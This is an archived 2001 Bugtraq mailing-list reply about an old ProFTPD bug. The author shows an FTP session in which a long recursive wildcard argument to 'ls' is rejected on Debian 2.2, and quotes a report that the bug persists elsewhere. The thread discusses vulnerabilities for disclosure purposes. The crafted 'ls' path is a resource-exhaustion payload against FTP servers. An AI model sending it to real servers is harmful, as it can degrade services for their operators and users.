RE: Multiple-Vendor-FTP-Vuln. (old?)

From: Michael Bellears (michael.bellearsat_private)
Date: Mon Aug 20 2001 - 15:43:54 PDT

Next message: jeev: "RE: Multiple-Vendor-FTP-Vuln. (old?)"

Previous message: Scott Dier: "Re: Multiple-Vendor-FTP-Vuln. (old?)"
Maybe in reply to: Enrico Kern: "Multiple-Vendor-FTP-Vuln. (old?)"
Next in thread: Mike Jakubik: "RE: Multiple-Vendor-FTP-Vuln. (old?)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Couldn't reproduce on Debian 2.2....

isp-server-03:/# proftpd -v
 - ProFTPD Version 1.2.0pre10

Remote system type is UNIX.
Using binary mode to transfer files.
ftp> bin
200 Type set to I.
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
550 /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*:
Forbidden command argument
ftp> quit
221 Goodbye.

Regards,
MB

> -----Original Message-----
> From: Michael Faurot [mailto:mfaurotat_private]
> Sent: Tuesday, 21 August 2001 5:20 AM
> To: bugtraqat_private
> Subject: Re: Multiple-Vendor-FTP-Vuln. (old?)
> 
> 
> Enrico Kern <IphantomIat_private> wrote:
> : Hi,
> 
> : i tested an old proftpd bug (ls 
> /../*/../*/../*/../*/../*/../*/../*) on =
> : many new Linux-Dist.. 
> 
> This bug appears to still be present with Debian Stable (Potato) which
> uses ProFTPd v1.2.0pre10.
> 
> -- 
> --------------------------------------------------------------
> ----------------
>  Michael | mfaurot  | Give your child mental blocks for Christmas.
>  Faurot  | atww.org | 
>

Next message: jeev: "RE: Multiple-Vendor-FTP-Vuln. (old?)"
Previous message: Scott Dier: "Re: Multiple-Vendor-FTP-Vuln. (old?)"
Maybe in reply to: Enrico Kern: "Multiple-Vendor-FTP-Vuln. (old?)"
Next in thread: Mike Jakubik: "RE: Multiple-Vendor-FTP-Vuln. (old?)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Aug 20 2001 - 16:03:06 PDT